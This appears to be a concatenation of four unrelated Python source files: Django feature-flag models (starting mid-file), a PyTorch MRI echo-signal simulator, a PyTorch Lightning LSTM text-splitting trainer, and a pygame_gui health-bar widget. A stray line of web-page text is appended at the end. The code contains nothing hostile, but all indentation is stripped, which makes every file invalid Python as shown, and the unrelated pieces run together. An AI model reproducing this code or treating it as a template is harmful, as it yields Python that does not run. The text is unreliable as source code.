if typing.TYPE_CHECKING:
from environments.identities.models import Identity
from environments.models import Environment
@python_2_unicode_compatible
class Feature(CustomLifecycleModelMixin, models.Model):
name = models.CharField(max_length=2000)
created_date = models.DateTimeField("DateCreated", auto_now_add=True)
project = models.ForeignKey(
Project,
related_name="features",
help_text=_(
"Changing the project selected will remove previous Feature States for the previously"
"associated projects Environments that are related to this Feature. New default "
"Feature States will be created for the new selected projects Environments for this "
"Feature. Also this will remove any Tags associated with a feature as Tags are Project defined"
),
on_delete=models.CASCADE,
)
initial_value = models.CharField(
max_length=20000, null=True, default=None, blank=True
)
description = models.TextField(null=True, blank=True)
default_enabled = models.BooleanField(default=False)
type = models.CharField(max_length=50, null=True, blank=True)
history = HistoricalRecords()
tags = models.ManyToManyField(Tag, blank=True)
is_archived = models.BooleanField(default=False)
owners = models.ManyToManyField(
"users.FFAdminUser", related_name="owned_features", blank=True
)
class Meta:
# Note: uniqueness is changed to reference lowercase name in explicit SQL in the migrations
unique_together = ("name", "project")
ordering = ("id",) # explicit ordering to prevent pagination warnings
@hook(AFTER_CREATE)
def create_feature_states(self):
# create feature states for all environments
environments = self.project.environments.all()
for env in environments:
# unable to bulk create as we need signals
FeatureState.objects.create(
feature=self,
environment=env,
identity=None,
feature_segment=None,
enabled=self.default_enabled,
)
def validate_unique(self, *args, **kwargs):
"""
Checks unique constraints on the model and raises ``ValidationError``
if any failed.
"""
super(Feature, self).validate_unique(*args, **kwargs)
# handle case insensitive names per project, as above check allows it
if (
Feature.objects.filter(project=self.project, name__iexact=self.name)
.exclude(pk=self.pk)
.exists()
):
raise ValidationError(
{
NON_FIELD_ERRORS: [
"Feature with that name already exists for this project. Note that feature "
"names are case insensitive.",
],
}
)
def __str__(self):
return "Project %s - Feature %s" % (self.project.name, self.name)
def get_next_segment_priority(feature):
feature_segments = FeatureSegment.objects.filter(feature=feature).order_by(
"-priority"
)
if feature_segments.count() == 0:
return 1
else:
return feature_segments.first().priority + 1
@python_2_unicode_compatible
class FeatureSegment(OrderedModelBase):
feature = models.ForeignKey(
Feature, on_delete=models.CASCADE, related_name="feature_segments"
)
segment = models.ForeignKey(
"segments.Segment", related_name="feature_segments", on_delete=models.CASCADE
)
environment = models.ForeignKey(
"environments.Environment",
on_delete=models.CASCADE,
related_name="feature_segments",
)
_enabled = models.BooleanField(
default=False,
db_column="enabled",
help_text="Deprecated in favour of using FeatureStateValue.",
)
_value = models.CharField(
max_length=2000,
blank=True,
null=True,
db_column="value",
help_text="Deprecated in favour of using FeatureStateValue.",
)
_value_type = models.CharField(
choices=FEATURE_STATE_VALUE_TYPES,
max_length=50,
blank=True,
null=True,
db_column="value_type",
help_text="Deprecated in favour of using FeatureStateValue.",
)
# specific attributes for managing the order of feature segments
priority = models.PositiveIntegerField(editable=False, db_index=True)
order_field_name = "priority"
order_with_respect_to = ("feature", "environment")
# used for audit purposes
history = HistoricalRecords()
class Meta:
unique_together = ("feature", "environment", "segment")
ordering = ("priority",)
def __str__(self):
return (
"FeatureSegment for "
+ self.feature.name
+ " with priority "
+ str(self.priority)
)
def __lt__(self, other):
"""
Kind of counter intuitive but since priority 1 is highest, we want to check if priority is GREATER than the
priority of the other feature segment.
"""
return other and self.priority > other.priority
def clone(self, environment: "Environment") -> "FeatureSegment":
clone = deepcopy(self)
clone.id = None
clone.environment = environment
clone.save()
return clone
# noinspection PyTypeChecker
def get_value(self):
return get_correctly_typed_value(self.value_type, self.value)
@python_2_unicode_compatible
class FeatureState(LifecycleModel, models.Model):
feature = models.ForeignKey(
Feature, related_name="feature_states", on_delete=models.CASCADE
)
environment = models.ForeignKey(
"environments.Environment",
related_name="feature_states",
null=True,
on_delete=models.CASCADE,
)
identity = models.ForeignKey(
"identities.Identity",
related_name="identity_features",
null=True,
default=None,
blank=True,
on_delete=models.CASCADE,
)
feature_segment = models.ForeignKey(
FeatureSegment,
related_name="feature_states",
null=True,
blank=True,
default=None,
on_delete=models.CASCADE,
)
enabled = models.BooleanField(default=False)
history = HistoricalRecords()
class Meta:
# Note: this is manually overridden in the migrations for Oracle DBs to include
# all 4 unique fields in each of these constraints. See migration 0025.
constraints = [
UniqueConstraint(
fields=["environment", "feature", "feature_segment"],
condition=Q(identity__isnull=True),
name="unique_for_feature_segment",
),
UniqueConstraint(
fields=["environment", "feature", "identity"],
condition=Q(feature_segment__isnull=True),
name="unique_for_identity",
),
UniqueConstraint(
fields=["environment", "feature"],
condition=Q(identity__isnull=True, feature_segment__isnull=True),
name="unique_for_environment",
),
]
ordering = ["id"]
def __gt__(self, other):
"""
Checks if the current feature state is higher priority that the provided feature state.
:param other: (FeatureState) the feature state to compare the priority of
:return: True if self is higher priority than other
"""
if self.environment != other.environment:
raise ValueError(
"Cannot compare feature states as they belong to different environments."
)
if self.feature != other.feature:
raise ValueError(
"Cannot compare feature states as they belong to different features."
)
if self.identity:
# identity is the highest priority so we can always return true
if other.identity and self.identity != other.identity:
raise ValueError(
"Cannot compare feature states as they are for different identities."
)
return True
if self.feature_segment:
# Return true if other_feature_state has a lower priority feature segment and not an identity overridden
# flag, else False.
return not (other.identity or self.feature_segment < other.feature_segment)
# if we've reached here, then self is just the environment default. In this case, other is higher priority if
# it has a feature_segment or an identity
return not (other.feature_segment or other.identity)
def clone(self, env: "Environment") -> "FeatureState":
# Clonning the Identity is not allowed because they are closely tied
# to the enviroment
assert self.identity is None
clone = deepcopy(self)
clone.id = None
clone.feature_segment = (
FeatureSegment.objects.get(
environment=env,
feature=clone.feature,
segment=self.feature_segment.segment,
)
if self.feature_segment
else None
)
clone.environment = env
clone.save()
# clone the related objects
self.feature_state_value.clone(clone)
return clone
def get_feature_state_value(self, identity: "Identity" = None) -> typing.Any:
feature_state_value = (
self.get_multivariate_feature_state_value(identity)
if self.feature.type == MULTIVARIATE and identity
else getattr(self, "feature_state_value", None)
)
# return the value of the feature state value only if the feature state
# has a related feature state value. Note that we use getattr rather than
# hasattr as we want to return None if no feature state value exists.
return feature_state_value and feature_state_value.value
def get_multivariate_feature_state_value(
self, identity: "Identity"
) -> AbstractBaseFeatureValueModel:
# the multivariate_feature_state_values should be prefetched at this point
# so we just convert them to a list and use python operations from here to
# avoid further queries to the DB
mv_options = list(self.multivariate_feature_state_values.all())
percentage_value = (
get_hashed_percentage_for_object_ids([self.id, identity.id]) * 100
)
# Iterate over the mv options in order of id (so we get the same value each
# time) to determine the correct value to return to the identity based on
# the percentage allocations of the multivariate options. This gives us a
# way to ensure that the same value is returned every time we use the same
# percentage value.
start_percentage = 0
for mv_option in sorted(mv_options, key=lambda o: o.id):
limit = getattr(mv_option, "percentage_allocation", 0) + start_percentage
if start_percentage <= percentage_value < limit:
return mv_option.multivariate_feature_option
start_percentage = limit
# if none of the percentage allocations match the percentage value we got for
# the identity, then we just return the default feature state value (or None
# if there isn't one - although this should never happen)
return getattr(self, "feature_state_value", None)
@property
def previous_feature_state_value(self):
try:
history_instance = self.feature_state_value.history.first()
return (
history_instance
and getattr(history_instance, "prev_record", None)
and history_instance.prev_record.instance.value
)
except ObjectDoesNotExist:
return None
@hook(BEFORE_CREATE)
def check_for_existing_env_feature_state(self):
# prevent duplicate feature states being created for an environment
if FeatureState.objects.filter(
environment=self.environment, feature=self.feature
).exists() and not (self.identity or self.feature_segment):
raise ValidationError(
"Feature state already exists for this environment and feature"
)
@hook(AFTER_CREATE)
def create_feature_state_value(self):
# note: this is only performed after create since feature state values are
# updated separately, and hence if this is performed after each save,
# it overwrites the FSV with the initial value again
FeatureStateValue.objects.create(
feature_state=self,
**self.get_feature_state_value_defaults(),
)
@hook(AFTER_CREATE)
def create_multivariate_feature_state_values(self):
if not (self.feature_segment or self.identity):
# we only want to create the multivariate feature state values for
# feature states related to an environment only, i.e. when a new
# environment is created or a new MV feature is created
mv_feature_state_values = [
MultivariateFeatureStateValue(
feature_state=self,
multivariate_feature_option=mv_option,
percentage_allocation=mv_option.default_percentage_allocation,
)
for mv_option in self.feature.multivariate_options.all()
]
MultivariateFeatureStateValue.objects.bulk_create(mv_feature_state_values)
def get_feature_state_value_defaults(self) -> dict:
if self.feature.initial_value is None:
return {}
value = self.feature.initial_value
type = get_value_type(value)
parse_func = {
BOOLEAN: get_boolean_from_string,
INTEGER: get_integer_from_string,
}.get(type, lambda v: v)
key_name = self.get_feature_state_key_name(type)
return {"type": type, key_name: parse_func(value)}
@staticmethod
def get_feature_state_key_name(fsv_type) -> str:
return {
INTEGER: "integer_value",
BOOLEAN: "boolean_value",
STRING: "string_value",
}.get(fsv_type)
@staticmethod
def get_featue_state_value_type(value) -> str:
fsv_type = type(value).__name__
accepted_types = (STRING, INTEGER, BOOLEAN)
# Default to string if not an anticipate type value to keep backwards compatibility.
return fsv_type if fsv_type in accepted_types else STRING
def generate_feature_state_value_data(self, value):
"""
Takes the value of a feature state to generate a feature state value and returns dictionary
to use for passing into feature state value serializer
:param value: feature state value of variable type
:return: dictionary to pass directly into feature state value serializer
"""
fsv_type = self.get_featue_state_value_type(value)
return {
"type": fsv_type,
"feature_state": self.id,
self.get_feature_state_key_name(fsv_type): value,
}
def __str__(self):
s = f"Feature {self.feature.name} - Enabled: {self.enabled}"
if self.environment is not None:
s = f"{self.environment} - {s}"
elif self.identity is not None:
s = f"Identity {self.identity.identifier} - {s}"
return s
class FeatureStateValue(AbstractBaseFeatureValueModel):
feature_state = models.OneToOneField(
FeatureState, related_name="feature_state_value", on_delete=models.CASCADE
)
# TODO: increase max length of string value on base model class
string_value = models.CharField(null=True, max_length=20000, blank=True)
history = HistoricalRecords()
def clone(self, feature_state: FeatureState) -> "FeatureStateValue":
clone = deepcopy(self)
clone.id = None
clone.feature_state = feature_state
clone.save()
return clone
|
from __future__ import division
import numpy as np
from warnings import warn
import torch
# Fixed MRI Simulator
def get_precomputed_matrices(batch_size, alphas, T):
cosa2 = torch.cos(alphas/2.)**2
sina2 = torch.sin(alphas/2.)**2
cosa = torch.cos(alphas)
sina = torch.sin(alphas)
RR = torch.zeros(batch_size, 3, 3, T, device=alphas.device)
RR[:, 0, 0, :] = cosa2
RR[:, 0, 1, :] = sina2
RR[:, 0, 2, :] = sina
RR[:, 1, 0, :] = sina2
RR[:, 1, 1, :] = cosa2
RR[:, 1, 2, :] = -sina
RR[:, 2, 0, :] = -0.5 * sina
RR[:, 2, 1, :] = 0.5 * sina
RR[:, 2, 2, :] = cosa
return RR
def rf(matrices, FpFmZ):
""" Propagate EPG states through an RF rotation of
alpha (radians). Assumes CPMG condition, i.e.
magnetization lies on the real x axis.
"""
return torch.matmul(matrices, FpFmZ)
def rf_ex(FpFmZ, alpha):
"Same as rf2_ex, but only returns FpFmZ"""
return rf2_ex(FpFmZ, alpha)[0]
def rf2_ex(FpFmZ, alpha):
""" Propagate EPG states through an RF excitation of
alpha (radians) along the y direction, i.e. phase of pi/2.
in Pytorch
INPUT:
FpFmZ = 3xN vector of F+, F- and Z states.
alpha = RF pulse flip angle in radians
OUTPUT:
FpFmZ = Updated FpFmZ state.
RR = RF rotation matrix (3x3).
"""
try:
alpha = alpha[0]
except:
pass
if torch.abs(alpha) > 2 * np.pi:
warn('rf2_ex: Flip angle should be in radians! alpha=%f' % alpha)
cosa2 = torch.cos(alpha/2.)**2
sina2 = torch.sin(alpha/2.)**2
cosa = torch.cos(alpha)
sina = torch.sin(alpha)
RR = torch.tensor([[cosa2, -sina2, sina],
[-sina2, cosa2, sina],
[-0.5 * sina, -0.5 * sina, cosa]], device=alpha.device)
FpFmZ = torch.matmul(RR, FpFmZ)
return FpFmZ, RR
def relax_mat(T, T1, T2):
E2 = torch.exp(-T/T2)
E1 = torch.exp(-T/T1)
# Decay of states due to relaxation alone.
mat = torch.stack([E2, E2, E1], dim=1)
EE = torch.diag_embed(mat)
# TODO Switch to point-wise multiplication
return EE
def relax(FpFmZ, T1, T2, EE, RR):
""" Propagate EPG states through a period of relaxation over
an interval T.
torch
INPUT:
FpFmZ = 3xN vector of F+, F- and Z states.
T1, T2 = Relaxation times (same as T)
T = Time interval (same as T1,T2)
OUTPUT:
FpFmZ = updated F+, F- and Z states.
EE = decay matrix, 3x3 = diag([E2 E2 E1]);
"""
FpFmZ = torch.matmul(EE, FpFmZ) # Apply Relaxation
FpFmZ[:, 2, 0] = FpFmZ[:, 2, 0] + RR # Recovery
return FpFmZ
def grad(FpFmZ, i, noadd=False):
"""Propagate EPG states through a "unit" gradient. Assumes CPMG condition,
i.e. all states are real-valued.
INPUT:
FpFmZ = 3xN vector of F+, F- and Z states.
noadd = True to NOT add any higher-order states - assume
that they just go to zero. Be careful - this
speeds up simulations, but may compromise accuracy!
OUTPUT:
Updated FpFmZ state.
"""
x = FpFmZ.clone() # required to avoid in-place memory op
FpFmZ[:, 0, 1:] = x[:, 0, :-1] # shift Fp states
FpFmZ[:, 1, :-1] = x[:, 1, 1:] # shift Fm states
FpFmZ[:, 1, -1] = 0 # Zero highest Fm state
FpFmZ[:, 0, 0] = FpFmZ[:, 1, 0]
return FpFmZ
def FSE_TE(FpFmZ, alpha, TE, T1, T2, i, EE, RR, matrices, noadd=True, recovery=True):
""" Propagate EPG states through a full TE, i.e.
relax -> grad -> rf -> grad -> relax.
Assumes CPMG condition, i.e. all states are real-valued.
INPUT:
FpFmZ = 3xN vector of F+, F- and Z states.
alpha = RF pulse flip angle in radians
T1, T2 = Relaxation times (same as TE)
TE = Echo Time interval (same as T1, T2)
noadd = True to NOT add any higher-order states - assume
that they just go to zero. Be careful - this
speeds up simulations, but may compromise accuracy!
OUTPUT:
FpFmZ = updated F+, F- and Z states.
"""
FpFmZ = relax(FpFmZ, T1, T2, EE, RR)
FpFmZ = grad(FpFmZ, noadd, i)
FpFmZ = rf(matrices[:, :, :, i], FpFmZ)
FpFmZ = grad(FpFmZ, noadd, i)
FpFmZ = relax(FpFmZ, T1, T2, EE, RR)
return FpFmZ
# Full FSE EPG function across T time points
def FSE_signal_TR_ex(angle_ex_rad, angles_rad, TE, TR, T1, T2, B1=1.):
"""Same as FSE_signal2_TR_ex, but only returns Mxy"""
return FSE_signal2_TR_ex(angle_ex_rad, angles_rad, TE, TR, T1, T2, B1)[0]
def epg_parallel(angles_rad, TE, TR, T1, T2, B1=1.):
return FSE_signal_TR(angles_rad, TE, TR, T1, T2, B1)
def FSE_signal_TR(angles_rad, TE, TR, T1, T2, B1=1.):
"""Same as FSE_signal2_TR, but only returns Mxy"""
return FSE_signal2_TR(angles_rad, TE, TR, T1, T2, B1)[0]
def FSE_signal2_TR(angles_rad, TE, TR, T1, T2, B1=1.):
"""Same as FSE_signal2, but includes finite TR"""
pi = torch.tensor(np.pi, device=T2.device)
return FSE_signal2_TR_ex(pi/2, angles_rad, TE, TR, T1, T2, 1.)
def FSE_signal2_TR_ex(angle_ex_rad, angles_rad, TE, TR, T1, T2, B1=1.):
"""Same as FSE_signal2_ex, but includes finite TR"""
T = angles_rad.shape[1]
Mxy, Mz = FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1)
UR = TR - T * TE
E1 = torch.exp(-UR/T1)[:, None, None]
sig = Mxy * (1 - E1) / (1 - Mz[:, -1, :][:, None, :] * E1)
return sig, Mz
def FSE_signal_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1=1.):
"""Same as FSE_signal2_ex, but only returns Mxy"""
return FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1)[0]
def FSE_signal(angles_rad, TE, T1, T2):
"""Same as FSE_signal2, but only returns Mxy"""
z = FSE_signal2(angles_rad, TE, T1, T2)[0]
return z
def FSE_signal2(angles_rad, TE, T1, T2):
"""Same as FSE_signal2_ex, but assumes excitation pulse is 90 degrees"""
pi = torch.tensor(np.pi, device=T2.device)
return FSE_signal2_ex(pi/2, angles_rad, TE, T1, T2)
def FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1=1.):
"""Simulate Fast Spin-Echo CPMG sequence with specific flip angle train.
Prior to the flip angle train, an excitation pulse of angle_ex_rad degrees
is applied in the Y direction. The flip angle train is then applied in the X direction.
INPUT:
angles_rad = array of flip angles in radians equal to echo train length
TE = echo time/spacing
T1 = T1 value in seconds
T2 = T2 value in seconds
OUTPUT:
Mxy = Transverse magnetization at each echo time
Mz = Longitudinal magnetization at each echo time
"""
batch_size = T2.shape[0]
T = angles_rad.shape[1]
Mxy = torch.zeros((batch_size, T, 1),
requires_grad=False, device=T2.device)
Mz = torch.zeros((batch_size, T, 1), requires_grad=False, device=T2.device)
P = torch.zeros((batch_size, 3, 2*T+1),
dtype=torch.float32, device=T2.device)
P[:, 2, 0] = 1.
try:
B1 = B1[0]
except:
pass
# pre-scale by B1 homogeneity
angle_ex_rad = B1 * angle_ex_rad
angles_rad = B1 * angles_rad
P = rf_ex(P, angle_ex_rad) # initial tip
EE = relax_mat(TE/2., T1, T2)
E1 = torch.exp(-TE/2./T1)
RR = 1 - E1
matrices = get_precomputed_matrices(batch_size, angles_rad, T)
for i in range(T):
P = FSE_TE(P, angles_rad[:, i], TE, T1, T2, i, EE, RR, matrices)
Mxy[:, i, 0] = P[:, 0, 0]
Mz[:, i, 0] = P[:, 2, 0]
return Mxy, Mz
def SE_sim(angle_ex_rad, angles_rad, TE, T1, T2, TR, B1=1.):
Mxy, Mz = FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1=1.)
par = 1 - torch.exp(-(TR - TE)/T1)
return Mxy * par.float(), Mz
|
from pathlib import Path
import numpy as np
from torch import nn
import torch
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.trainer import Trainer
from sklearn.model_selection import train_test_split
from torch.utils import data
from dataset import SplitDataset
from argparse import ArgumentParser
from utils import postprocess
import json
class Network(pl.LightningModule):
ONNX_NAME = "model.onnx"
def __init__(self, text_dataset, labeler, hparams):
super().__init__()
self.text_dataset = text_dataset
self.labeler = labeler
self.hparams = hparams
self.embedding = nn.Embedding(256, 64)
self.downsample = nn.Conv1d(64, 64, kernel_size=2, stride=2)
self.lstm1 = nn.LSTM(64, 128, bidirectional=True, batch_first=True)
self.lstm2 = nn.LSTM(256, 128, bidirectional=True, batch_first=True)
self.lstm3 = nn.LSTM(256, 128, bidirectional=True, batch_first=True)
self.out = nn.Linear(256, 2 * len(hparams.predict_indices))
def prepare_data(self):
dataset = SplitDataset(
self.text_dataset,
self.labeler,
500,
800,
20,
return_indices=self.hparams.predict_indices,
)
train_indices, valid_indices = train_test_split(
np.arange(len(dataset)), test_size=self.hparams.test_size, random_state=1234
)
self.train_dataset = data.Subset(dataset, train_indices)
self.valid_dataset = data.Subset(dataset, valid_indices)
def forward(self, x):
input_length = x.shape[1]
h = self.embedding(x.long())
h = self.downsample(h.permute(0, 2, 1)).permute(0, 2, 1)
h, _ = self.lstm1(h)
h, _ = self.lstm2(h)
h, _ = self.lstm3(h)
h = self.out(h).reshape(-1, input_length, len(self.hparams.predict_indices))
return h
def loss(self, y_hat, y):
weight = (
torch.tensor(self.hparams.level_weights)
.view((1, 1, len(self.hparams.level_weights)))
.to(y_hat.device)
)
return F.binary_cross_entropy_with_logits(
y_hat, y.float(), pos_weight=torch.tensor(10.0), weight=weight
)
def training_step(self, batch, batch_idx):
x, y = batch
y_hat = self.forward(x)
loss = self.loss(y_hat, y)
tensorboard_logs = {"train_loss": loss}
return {"loss": loss, "log": tensorboard_logs}
def validation_step(self, batch, batch_idx):
x, y = batch
y_hat = self.forward(x)
val_loss = self.loss(y_hat, y)
threshold = 0.5
n_labels = y.shape[-1]
y_flat = y.view((-1, n_labels))
pred_flat = y_hat.view((-1, n_labels)) > threshold
tp = ((pred_flat == 1) & (y_flat == 1)).sum(dim=0)
fp = ((pred_flat == 1) & (y_flat == 0)).sum(dim=0)
fn = ((pred_flat == 0) & (y_flat == 1)).sum(dim=0)
return {"val_loss": val_loss, "tp": tp, "fp": fp, "fn": fn}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x["val_loss"] for x in outputs]).mean()
tp = torch.stack([x["tp"] for x in outputs]).sum(dim=0)
fp = torch.stack([x["fp"] for x in outputs]).sum(dim=0)
fn = torch.stack([x["fn"] for x in outputs]).sum(dim=0)
precision = tp / (tp + fp + 1e-9)
recall = tp / (tp + fn + 1e-9)
f1 = 2 * (precision * recall) / (precision + recall + 1e-9)
print()
for i in range(len(f1)):
print(
f"f1={f1[i]:.3f}\tprecision={precision[i]:.3f}\trecall={recall[i]:.3f}"
)
tensorboard_logs = {"val_loss": avg_loss}
return {"avg_val_loss": avg_loss, "log": tensorboard_logs}
def configure_optimizers(self):
adam = torch.optim.AdamW(self.parameters())
return [adam], []
def train_dataloader(self):
# define 1 epoch = n random samples from train data
# multiprocessing with spacy leaks memory so could go OOM without a sample limit
# reload_dataloaders_every_epoch must be True in trainer
# so that memory is cleaned up after each epoch
epoch_indices = np.random.choice(
np.arange(len(self.train_dataset)), self.hparams.train_size
)
epoch_sample = data.Subset(self.train_dataset, epoch_indices)
return data.DataLoader(
epoch_sample,
batch_size=self.hparams.batch_size,
shuffle=True,
num_workers=6,
collate_fn=SplitDataset.collate_fn,
)
def val_dataloader(self):
return data.DataLoader(
self.valid_dataset,
batch_size=256,
shuffle=False,
num_workers=6,
collate_fn=SplitDataset.collate_fn,
)
def store(self, directory, metadata):
store_directory = Path(directory)
store_directory.mkdir(exist_ok=True, parents=True)
sample = torch.zeros([1, 100], dtype=torch.int8)
model_path = store_directory / self.ONNX_NAME
torch.onnx.export(
self.float().cpu(),
sample.cpu(),
model_path,
input_names=["input"],
output_names=["output"],
dynamic_axes={
"input": {0: "batch", 1: "length"},
"output": {0: "batch", 1: "length"},
},
)
postprocess(
model_path,
metadata,
)
@staticmethod
def get_parser():
parser = ArgumentParser()
parser.add_argument(
"--test_size", type=int, help="Number of samples for test set."
)
parser.add_argument(
"--train_size",
type=int,
help="Number of samples to train on for one epoch. "
"Will be sampled without replacement from the text dataset.",
)
parser.add_argument(
"--predict_indices",
nargs="+",
type=int,
default=[],
help="Which levels of the splits to predict.",
)
parser.add_argument(
"--level_weights",
nargs="+",
type=float,
default=[],
help="Determines how much each level contributes to the loss. Must have the same length as the indices to predict.",
)
parser.add_argument(
"--batch_size",
type=int,
)
parser = Trainer.add_argparse_args(parser)
parser.set_defaults(
train_size=1_000_000,
test_size=50_000,
batch_size=128,
max_epochs=1,
reload_dataloaders_every_epoch=True,
)
return parser
|
from typing import Union, Dict
import pygame
from pygame_gui.core.interfaces import IContainerLikeInterface, IUIManagerInterface
from pygame_gui.core import UIElement
from pygame_gui.core.drawable_shapes import RectDrawableShape, RoundedRectangleShape
class UIWorldSpaceHealthBar(UIElement):
"""
A UI that will display a sprite's 'health_capacity' and their 'current_health' in 'world space'
above the sprite. This means that the health bar will move with the camera and the sprite
itself.
A sprite passed to this class must have the attributes 'health_capacity' and 'current_health'.
:param relative_rect: The rectangle that defines the size of the health bar.
:param sprite_to_monitor: The sprite we are displaying the health of.
:param manager: The UIManager that manages this element.
:param container: The container that this element is within. If set to None will be the root
window's container.
:param parent_element: The element this element 'belongs to' in the theming hierarchy.
:param object_id: A custom defined ID for fine tuning of theming.
:param anchors: A dictionary describing what this element's relative_rect is relative to.
"""
class ExampleHealthSprite(pygame.sprite.Sprite):
"""
An example sprite with health instance attributes.
:param groups: Sprite groups to put the sprite in.
"""
def __init__(self, *groups):
super().__init__(*groups)
self.current_health = 50
self.health_capacity = 100
self.rect = pygame.Rect(0, 0, 32, 64)
def __init__(self,
relative_rect: pygame.Rect,
sprite_to_monitor: Union[pygame.sprite.Sprite, ExampleHealthSprite],
manager: IUIManagerInterface,
container: Union[IContainerLikeInterface, None] = None,
parent_element: UIElement = None,
object_id: Union[str, None] = None,
anchors: Dict[str, str] = None):
super().__init__(relative_rect, manager, container,
starting_height=1,
layer_thickness=1,
anchors=anchors)
self._create_valid_ids(container=container,
parent_element=parent_element,
object_id=object_id,
element_id='world_space_health_bar')
if sprite_to_monitor is not None:
if not hasattr(sprite_to_monitor, 'health_capacity'):
raise AttributeError('Sprite does not have health_capacity attribute')
if not hasattr(sprite_to_monitor, 'current_health'):
raise AttributeError('Sprite does not have current_health attribute')
self.sprite_to_monitor = sprite_to_monitor
else:
self.sprite_to_monitor = None
raise AssertionError('Need sprite to monitor')
self.current_health = self.sprite_to_monitor.current_health
self.health_capacity = self.sprite_to_monitor.health_capacity
self.health_percentage = self.current_health / self.health_capacity
self.border_colour = None
self.health_empty_colour = None
self.bar_filled_colour = None
self.bar_unfilled_colour = None
self.health_colour = None
self.hover_height = None
self.border_width = None
self.shadow_width = None
self.position = None
self.border_rect = None
self.capacity_width = None
self.capacity_height = None
self.health_capacity_rect = None
self.current_health_rect = None
self.drawable_shape = None
self.shape = 'rectangle'
self.shape_corner_radius = None
self.set_image(None)
self.rebuild_from_changed_theme_data()
def rebuild(self):
"""
Rebuild the health bar entirely because the theming data has changed.
"""
self.position = [self.sprite_to_monitor.rect.x,
self.sprite_to_monitor.rect.y - self.hover_height]
self.rect.x = self.position[0]
self.rect.y = self.position[1]
self.border_rect = pygame.Rect((self.shadow_width, self.shadow_width),
(self.rect.width - (self.shadow_width * 2),
self.rect.height - (self.shadow_width * 2)))
self.capacity_width = self.rect.width - (self.shadow_width * 2) - (self.border_width * 2)
self.capacity_height = self.rect.height - (self.shadow_width * 2) - (self.border_width * 2)
self.health_capacity_rect = pygame.Rect((self.border_width + self.shadow_width,
self.border_width + self.shadow_width),
(self.capacity_width, self.capacity_height))
self.current_health_rect = pygame.Rect((self.border_width + self.shadow_width,
self.border_width + self.shadow_width),
(int(self.capacity_width * self.health_percentage),
self.capacity_height))
self.redraw()
def update(self, time_delta: float):
"""
Updates the health bar sprite's image and rectangle with the latest health and position
data from the sprite we are monitoring
:param time_delta: time passed in seconds between one call to this method and the next.
"""
super().update(time_delta)
if self.alive():
self.position = [self.sprite_to_monitor.rect.x,
self.sprite_to_monitor.rect.y - self.hover_height]
self.rect.x = self.position[0]
self.rect.y = self.position[1]
self.relative_rect.topleft = self.rect.topleft
if (self.current_health != self.sprite_to_monitor.current_health) or (
self.health_capacity != self.sprite_to_monitor.health_capacity):
self.current_health = self.sprite_to_monitor.current_health
self.health_capacity = self.sprite_to_monitor.health_capacity
self.health_percentage = self.current_health / self.health_capacity
self.redraw()
def redraw(self):
"""
Redraw the health bar when something, other than it's position has changed.
"""
self.current_health_rect.width = int(self.capacity_width * self.health_percentage)
theming_parameters = {'normal_bg': self.bar_unfilled_colour,
'normal_border': self.border_colour,
'border_width': self.border_width,
'shadow_width': self.shadow_width,
'shape_corner_radius': self.shape_corner_radius,
'filled_bar': self.bar_filled_colour,
'filled_bar_width_percentage': self.health_percentage}
if self.shape == 'rectangle':
self.drawable_shape = RectDrawableShape(self.rect, theming_parameters,
['normal'], self.ui_manager)
elif self.shape == 'rounded_rectangle':
self.drawable_shape = RoundedRectangleShape(self.rect, theming_parameters,
['normal'], self.ui_manager)
self.set_image(self.drawable_shape.get_surface('normal'))
def rebuild_from_changed_theme_data(self):
"""
Called by the UIManager to check the theming data and rebuild whatever needs rebuilding
for this element when the theme data has changed.
"""
super().rebuild_from_changed_theme_data()
has_any_changed = False
if self._check_misc_theme_data_changed(attribute_name='shape',
default_value='rectangle',
casting_func=str,
allowed_values=['rectangle',
'rounded_rectangle']):
has_any_changed = True
if self._check_shape_theming_changed(defaults={'border_width': 1,
'shadow_width': 2,
'shape_corner_radius': 2}):
has_any_changed = True
if self._check_misc_theme_data_changed(attribute_name='hover_height',
default_value=1,
casting_func=int):
has_any_changed = True
border_colour = self.ui_theme.get_colour_or_gradient('normal_border',
self.combined_element_ids)
if border_colour != self.border_colour:
self.border_colour = border_colour
has_any_changed = True
bar_unfilled_colour = self.ui_theme.get_colour_or_gradient('unfilled_bar',
self.combined_element_ids)
if bar_unfilled_colour != self.bar_unfilled_colour:
self.bar_unfilled_colour = bar_unfilled_colour
has_any_changed = True
bar_filled_colour = self.ui_theme.get_colour_or_gradient('filled_bar',
self.combined_element_ids)
if bar_filled_colour != self.bar_filled_colour:
self.bar_filled_colour = bar_filled_colour
has_any_changed = True
if has_any_changed:
self.rebuild()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.